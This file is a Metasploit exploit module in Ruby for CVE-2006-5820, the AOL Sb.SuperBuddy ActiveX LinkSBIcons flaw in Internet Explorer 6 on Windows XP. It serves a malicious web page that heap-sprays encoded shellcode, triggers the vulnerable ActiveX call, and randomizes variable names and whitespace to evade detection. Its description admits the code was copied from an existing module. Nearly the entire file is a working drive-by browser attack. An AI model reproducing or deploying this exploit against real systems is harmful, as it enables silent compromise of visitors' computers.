aol-activex.txt

`require 'msf/core'  
  
module Msf  
  
class Exploits::Windows::Browser::AOL_SuperBuddy_LinkSBIcons < Msf::Exploit::Remote  
  
include Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'AOL Sb.Superbuddy vulnerability',  
'Description' => %q{  
This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code from a pre-existing metasploit module.  
},  
'License' => MSF_LICENSE,  
'Author' =>   
[   
'kradchad',  
'leetpete'  
],  
'Version' => '0.1',  
'References' =>   
[  
[ 'CVE', 'CVE-2006-5820']  
],  
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "\x00",  
  
},  
'Platform' => 'win',  
'Targets' =>  
[  
['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]  
],  
'DefaultTarget' => 0))  
end  
  
def autofilter  
false  
end  
  
def on_request_uri(cli, request)  
  
# Re-generate the payload  
return if ((p = regenerate_payload(cli)) == nil)  
  
# Encode the shellcode  
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))  
  
# Get a unicode friendly version of the return address  
addr_word = [target.ret].pack('V').unpack('H*')[0][0,4]  
  
# Randomize the javascript variable names   
var_buffer = rand_text_alpha(rand(30)+2)  
var_shellcode = rand_text_alpha(rand(30)+2)  
var_unescape = rand_text_alpha(rand(30)+2)  
var_x = rand_text_alpha(rand(30)+2)  
var_i = rand_text_alpha(rand(30)+2)  
var_tic = rand_text_alpha(rand(30)+2)  
var_toc = rand_text_alpha(rand(30)+2)  
  
# Randomize HTML data  
html = rand_text_alpha(rand(30)+2)  
  
# Build out the message  
content = %Q|  
<html>  
<head>  
<script>  
try {  
  
var #{var_unescape} = unescape ;  
var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;  
  
var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;  
while (#{var_buffer}.length <= 0x100000) #{var_buffer}+=#{var_buffer} ;  
  
var #{var_x} = new Array() ;   
for ( var #{var_i} =0 ; #{var_i} < 120 ; #{var_i}++ ) {  
#{var_x}[ #{var_i} ] =   
#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;  
}  
  
  
var #{var_tic} = new ActiveXObject( 'Sb.SuperBuddy.1' );   
try { #{var_tic}.LinkSBIcons( #{target.ret} ) ; } catch( e ) { }  
  
  
} catch( e ) { window.location = 'about:blank' ; }  
  
</script>  
</head>  
<body>  
#{html}  
</body>  
</html>   
|  
  
# Randomize the whitespace in the document  
content.gsub!(/\s+/) do |s|  
len = rand(100)+2  
set = "\x09\x20\x0d\x0a"  
buf = ''  
  
while (buf.length < len)  
buf << set[rand(set.length)].chr  
end  
  
buf  
end  
  
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")  
  
# Transmit the response to the client  
send_response_html(cli, content)  
end  
  
end  
  
end  
`